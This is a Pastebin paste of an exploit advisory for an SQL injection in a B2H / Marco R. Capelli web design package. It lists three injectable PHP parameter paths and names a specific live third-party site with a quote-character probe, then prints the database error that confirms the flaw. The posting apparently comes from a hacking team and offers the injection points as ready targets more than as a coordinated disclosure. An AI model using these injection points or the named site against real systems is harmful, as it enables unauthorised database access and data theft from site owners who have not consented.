Advertisement
KingSkrupellos

B2H Marco R. Capelli SQL Injection Exploit

Oct 10th, 2019
238
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.41 KB | None | 0 0
  1. ###################################################################
  2.  
  3. # Exploit Title : Original WebDesign By B2H WebMastering Marco R. Capelli SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 11/10/2019
  7. # Vendor Homepage : braintohand.com - martiria.com
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  12. Special Elements used in an SQL Command ('SQL Injection') ]
  13. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  14. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  15. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  16.  
  17. ###################################################################
  18.  
  19. # Impact :
  20. ***********
  21. B2H Marco R. Capelli is prone to an SQL-injection vulnerability because it fails to sufficiently
  22. sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow
  23. an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities
  24. in the underlying database. A remote attacker can send a specially crafted request to the vulnerable
  25. application and execute arbitrary SQL commands in application`s database. Further exploitation
  26. of this vulnerability may result in unauthorized data manipulation. An attacker can exploit this
  27. issue using a browser or with any SQL Injector Tool.
  28.  
  29. ###################################################################
  30.  
  31. # SQL Injection Exploit :
  32. **********************
  33. /NEWS/SHOWRAC.PHP?ID=[SQL Injection]
  34.  
  35. /concorsiesegnalazioni/REGIONE.PHP?REG=[SQL Injection]
  36.  
  37. /concorsiesegnalazioni/libronews.php?ID=[SQL Injection]
  38.  
  39. ###################################################################
  40.  
  41. # Example Vulnerable Sites :
  42. *************************
  43. [+] progettobabele.it/concorsiesegnalazioni/REGIONE.PHP?REG=1%27
  44.  
  45. ###################################################################
  46.  
  47. # Example SQL Database Error :
  48. ****************************
  49. Errore:You have an error in your SQL syntax; check the manual
  50. that corresponds to your MySQL server version for the right syntax
  51. to use near ''1'') ORDER BY `SCAD` ASC' at line 1
  52.  
  53. ###################################################################
  54.  
  55. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  56.  
  57. ###################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement